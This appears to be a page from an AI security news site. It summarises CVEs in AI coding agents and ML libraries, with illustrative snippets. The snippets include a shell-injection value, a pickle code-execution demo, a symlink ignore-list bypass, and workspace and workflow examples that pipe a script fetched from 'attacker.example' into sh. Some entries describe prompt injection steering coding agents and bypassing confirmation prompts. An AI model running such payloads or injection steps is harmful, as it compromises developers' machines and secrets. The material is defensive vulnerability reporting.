aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.


Maintained by

Truong (Jack) Luu

Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. Built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

Total tracked: 2,741 · Last 24 hours: 35 · Last 7 days: 173
Daily Briefing: Wednesday, April 1, 2026

- Claude Code Source Leaked via npm Packaging Error: Anthropic confirmed that Claude Code's source code (nearly 2,000 TypeScript files, over 512,000 lines of code) was accidentally exposed through an npm package that shipped a source map file. The leak reveals internal features and creates security risk, since attackers can study the system to bypass its safeguards. Users who downloaded the affected version on March 31, 2026 may have received trojanized (maliciously modified) software containing malware.

- AI Discovers Zero-Days in Vim and GNU Emacs Within Minutes: Researcher Hung Nguyen used Anthropic's Claude Code to discover zero-day flaws (previously unknown vulnerabilities) in Vim and GNU Emacs that let attackers execute arbitrary code by tricking users into opening malicious files. Claude Code generated working proof-of-concept exploits in minutes.

Latest Intel

01

CVE-2025-6638: Regular Expression Denial of Service (ReDoS) vulnerability in the Hugging Face Transformers library

security
Sep 12, 2025

A ReDoS vulnerability (regular expression denial of service, where specially crafted input causes a program to use excessive CPU by making regex matching extremely slow) was found in Hugging Face Transformers library version 4.52.4, specifically in the MarianTokenizer's `remove_language_code()` method. The bug is triggered by malformed language code patterns that force inefficient regex processing, potentially crashing or freezing the system.
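As a generic illustration of how this class of bug works (this is NOT the actual MarianTokenizer regex), nested quantifiers make a regex engine try exponentially many ways to split the input once a match is forced to fail:

```python
import re
import time

# Classic ReDoS shape: the nested quantifier (a+)+ lets the engine
# partition a run of "a"s in exponentially many ways, and the trailing
# "b" guarantees every partition is tried and rejected.
evil = re.compile(r"^(a+)+$")

def match_time(n: int) -> float:
    s = "a" * n + "b"  # non-matching input that triggers full backtracking
    start = time.perf_counter()
    evil.match(s)
    return time.perf_counter() - start

# Each extra "a" roughly doubles the work, so a modest input can pin a
# CPU for seconds -- the denial-of-service effect.
print(f"n=16: {match_time(16):.4f}s, n=22: {match_time(22):.4f}s")
```

Bounding input length before matching, or rewriting the pattern without nested quantifiers, removes the blowup.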

Critical This Week (5 issues)

- critical · CVE-2026-34162: FastGPT is an AI Agent building platform; prior to version 4.14.9.5, the FastGPT HTTP tools testing endpoint (/api/core/…) is affected (NVD/CVE Database, Mar 31, 2026)

- Google Addresses Vertex AI Security Issues After Weaponization Demo: Palo Alto Networks disclosed security problems in Google Cloud Platform's Vertex AI (Google's service for building and deploying machine learning models) after researchers demonstrated how to weaponize AI agents (autonomous programs that act with minimal human input); Google has begun addressing the disclosed issues.

- Meta Smartglasses Raise Privacy Concerns with Built-in AI Recording: Meta's smartglasses pair a built-in camera with an AI assistant that can describe what the wearer sees, but they raise significant privacy concerns because they can record video of bystanders without their knowledge or consent.

Fix: Update to version 4.53.0, where the vulnerability has been fixed. A patch is available at https://github.com/huggingface/transformers/commit/47c34fba5c303576560cb29767efb452ff12b8be.

NVD/CVE Database
02

CVE-2025-55319: AI command injection in Agentic AI and Visual Studio Code allows an unauthorized attacker to execute code over a network

security
Sep 11, 2025

CVE-2025-55319 is a command injection vulnerability (a type of attack where an attacker inserts malicious commands into a program's input) in Agentic AI (an AI system that can perform tasks independently) and Visual Studio Code that allows an unauthorized attacker to execute code over a network. The vulnerability stems from improper handling of special characters in commands, which lets attackers run arbitrary code on affected systems.

NVD/CVE Database
03

CVE-2025-59041: Claude Code is an agentic coding tool. At startup, Claude Code executed a command templated with the output of `git config user.email`

security
Sep 10, 2025

Claude Code, an agentic coding tool (software that can write and execute code with some autonomy), had a vulnerability where a maliciously configured git user email could trigger arbitrary code execution (running unintended commands on a system) when the tool started up, before the user approved workspace access. This affected all versions before 1.0.105.
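The underlying pattern, templating an untrusted config value into a shell command, can be sketched as follows (a minimal illustration, not Claude Code's actual code; the `echo` stands in for whatever command consumed the value):

```python
import shlex
import subprocess

# Hypothetical malicious value an attacker could plant via
#   git config user.email "attacker@example.com; touch /tmp/pwned"
email = "attacker@example.com; touch /tmp/pwned"

# UNSAFE: interpolating the raw value into a shell string lets the ";"
# end the first command and start a second, attacker-chosen one.
unsafe_cmd = f"echo {email}"  # would also run `touch /tmp/pwned`

# SAFE: quote the value so the shell treats it as a single literal argument.
safe_cmd = f"echo {shlex.quote(email)}"
result = subprocess.run(safe_cmd, shell=True, capture_output=True, text=True)
print(result.stdout.strip())  # the whole string is printed, nothing executed
```

Passing an argv list (`subprocess.run(["echo", email])`) avoids the shell entirely and is the more robust fix.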

Fix: Update Claude Code to version 1.0.105 or the latest version. Users with automatic updates enabled will have received this fix automatically; those updating manually should upgrade to version 1.0.105 or newer.

NVD/CVE Database
04

CVE-2025-58764: Claude Code is an agentic coding tool. Due to an error in command parsing, versions prior to 1.0.105 were vulnerable to a bypass of the command-confirmation prompt

security
Sep 10, 2025

Claude Code is an agentic coding tool that writes and runs code, but versions before 1.0.105 had a command-parsing bug that let attackers bypass the safety prompt (the confirmation step that asks the user to approve a command before it runs). To exploit it, an attacker would need to inject malicious content into the conversation with Claude Code.

Fix: Update to version 1.0.105 or the latest version. Users with auto-update enabled have already received this fix automatically.

NVD/CVE Database
05

CVE-2025-58756: MONAI (Medical Open Network for AI) is an AI toolkit for health care imaging. Versions up to and including 1.5.0 load model checkpoints insecurely

security
Sep 8, 2025

MONAI, an AI toolkit for medical imaging, has a deserialization vulnerability (unsafe unpickling, where untrusted data is converted back into executable code) in versions up to 1.5.0 when loading pre-trained model checkpoints from external sources. While one part of the code uses secure loading (`weights_only=True`), other parts load checkpoints insecurely, allowing attackers to execute malicious code if a checkpoint contains intentionally crafted harmful data.
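This class of bug, Python pickle deserialization running attacker-controlled code, can be demonstrated generically (this is not MONAI's code, and the callable here is deliberately harmless):

```python
import os
import pickle

class Malicious:
    # pickle calls __reduce__ to decide how to serialize an object; on
    # load, the returned callable is invoked with the given arguments,
    # so loading an untrusted pickle means running untrusted code.
    def __reduce__(self):
        return (os.getcwd, ())  # harmless stand-in for attacker code

payload = pickle.dumps(Malicious())
result = pickle.loads(payload)  # merely *loading* executes os.getcwd()
print(result)                   # prints the current working directory
```

This is why `torch.load(..., weights_only=True)` exists: it restricts unpickling to tensor data and rejects arbitrary callables. Loading checkpoints only from trusted sources, or using the safetensors format, sidesteps the issue entirely.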

NVD/CVE Database
06

Dual Thinking and Logical Processing in Human Vision and Multimodal Large Language Models

researchsafety
Sep 8, 2025

Researchers studied how humans use two types of thinking (fast intuitive processing and slower logical reasoning) when looking at images, and tested whether multimodal large language models (MLLMs, AI systems that process both text and images) show similar abilities. While MLLMs have improved at correcting intuitive errors, they still struggle with tasks that require deeper logical analysis; segmentation models (AI systems that identify objects in images) make errors resembling human intuitive mistakes rather than applying logical reasoning.

IEEE Xplore (Security & AI Journals)
07

CVE-2025-58374: Roo Code is an AI-powered autonomous coding agent that lives in users' editors. Versions 3.25.23 and below auto-approve `npm install` without user confirmation

security
Sep 5, 2025

Roo Code is an AI tool that helps developers write code directly in their editors, but versions 3.25.23 and older have a security flaw where npm install (a command that downloads and sets up code packages) is automatically approved without asking the user first. If a malicious repository's package.json file contains a postinstall script (code that runs automatically during package installation), it could execute harmful commands on the user's computer without their knowledge or consent.

Fix: This is fixed in version 3.26.0.

NVD/CVE Database
08

CVE-2025-58373: Roo Code is an AI-powered autonomous coding agent that lives in users' editors. Versions 3.25.23 and below allow .rooignore to be bypassed via symlinks

security
Sep 5, 2025

Roo Code is an AI tool that helps developers write code directly in their editor, but versions 3.25.23 and earlier have a security flaw where attackers can bypass .rooignore (a file that tells Roo Code which files to ignore) using symlinks (shortcuts that point to other files). This allows someone with write access to the workspace to trick Roo Code into reading sensitive files like passwords or configuration files that should have been hidden.
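A minimal sketch of the bypass (hypothetical file names; Roo Code's actual ignore logic is more involved): an ignore check on the path as given misses a symlink, while resolving the path first catches it:

```python
import os
import pathlib
import tempfile

root = tempfile.mkdtemp()
secret = os.path.join(root, ".env")
pathlib.Path(secret).write_text("API_KEY=hunter2\n")

# An attacker with write access drops an innocent-looking symlink
# pointing at the protected file.
link = os.path.join(root, "notes.txt")
os.symlink(secret, link)

IGNORED = {".env"}

def naive_is_ignored(path: str) -> bool:
    # Checks only the name as given -- "notes.txt" looks harmless.
    return os.path.basename(path) in IGNORED

def safe_is_ignored(path: str) -> bool:
    # Resolve symlinks first, then check the real target.
    return os.path.basename(os.path.realpath(path)) in IGNORED

print(naive_is_ignored(link), safe_is_ignored(link))  # False True
```

The general rule: enforce allow/deny lists on canonicalized paths, never on the names the caller supplies.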

Fix: This is fixed in version 3.26.0.

NVD/CVE Database
09

CVE-2025-58372: Roo Code is an AI-powered autonomous coding agent that lives in users' editors. Versions 3.25.23 and below do not properly protect workspace configuration files

security
Sep 5, 2025

Roo Code is an AI tool that automatically writes code in the user's editor, but versions 3.25.23 and earlier have a security flaw where workspace configuration files (.code-workspace files that store project settings) are not properly protected. An attacker using prompt injection (hiding malicious instructions in the AI's input) could trick the agent into writing harmful settings that execute as code when the project is reopened, potentially giving the attacker control of the user's machine.
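To make the "settings that execute as code" step concrete, here is a hypothetical .code-workspace fragment (not from the advisory) using VS Code's automatic-task mechanism, where a task with `"runOn": "folderOpen"` runs when the project is opened (subject to VS Code's workspace-trust and automatic-task prompts):

```json
{
  "folders": [{ "path": "." }],
  "tasks": {
    "version": "2.0.0",
    "tasks": [
      {
        "label": "totally-innocent-build",
        "type": "shell",
        "command": "curl https://attacker.example/payload.sh | sh",
        "runOptions": { "runOn": "folderOpen" }
      }
    ]
  }
}
```

Write access to workspace configuration is therefore equivalent to code execution, which is why agent tools need to treat these files as protected.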

Fix: Update to version 3.26.0 or later, which fixes this issue.

NVD/CVE Database
10

CVE-2025-58371: Roo Code is an AI-powered autonomous coding agent that lives in users' editors. In versions 3.26.6 and below, a GitHub workflow used unsanitized pull request metadata in a privileged context

security
Sep 5, 2025

Roo Code is an AI tool that helps developers write code automatically within their editors. In versions 3.26.6 and earlier, a GitHub workflow (an automated process that runs tasks in a repository) used unsanitized pull request metadata (input not checked for malicious content) in a privileged context, allowing remote code execution (RCE) of arbitrary commands on the Actions runner (the machine that runs automated tasks). This could let attackers steal secrets, modify code, or completely compromise the repository.
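The general pattern (a generic sketch, not Roo Code's actual workflow) is a privileged workflow expanding attacker-controlled PR metadata directly into a shell script:

```yaml
on: pull_request_target        # runs with the repository's secrets available

jobs:
  greet:
    runs-on: ubuntu-latest
    steps:
      # UNSAFE: the PR title is expanded into the script before the shell
      # runs, so a title like  "; curl attacker.example | sh; echo "
      # injects commands into the privileged runner.
      - run: echo "New PR: ${{ github.event.pull_request.title }}"

      # SAFER: pass untrusted metadata through an environment variable,
      # which the shell treats as data rather than code.
      - run: echo "New PR: $PR_TITLE"
        env:
          PR_TITLE: ${{ github.event.pull_request.title }}
```

GitHub's own hardening guidance recommends the environment-variable form for any `github.event.*` field an outside contributor can control.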

Fix: Update to version 3.26.7.

NVD/CVE Database
Critical This Week (continued)

- critical · CVE-2025-15379: A command injection vulnerability in MLflow's model serving container initialization code (NVD/CVE Database, Mar 30, 2026)
- critical · CVE-2026-33873: Langflow is a tool for building and deploying AI-powered agents and workflows; versions prior to 1.9.0 are affected (NVD/CVE Database, Mar 27, 2026)
- critical · Attackers exploit critical Langflow RCE within hours as CISA sounds alarm (CSO Online, Mar 27, 2026)
- critical · CVE-2025-53521: F5 BIG-IP Unspecified Vulnerability (CISA Known Exploited Vulnerabilities, Mar 26, 2026)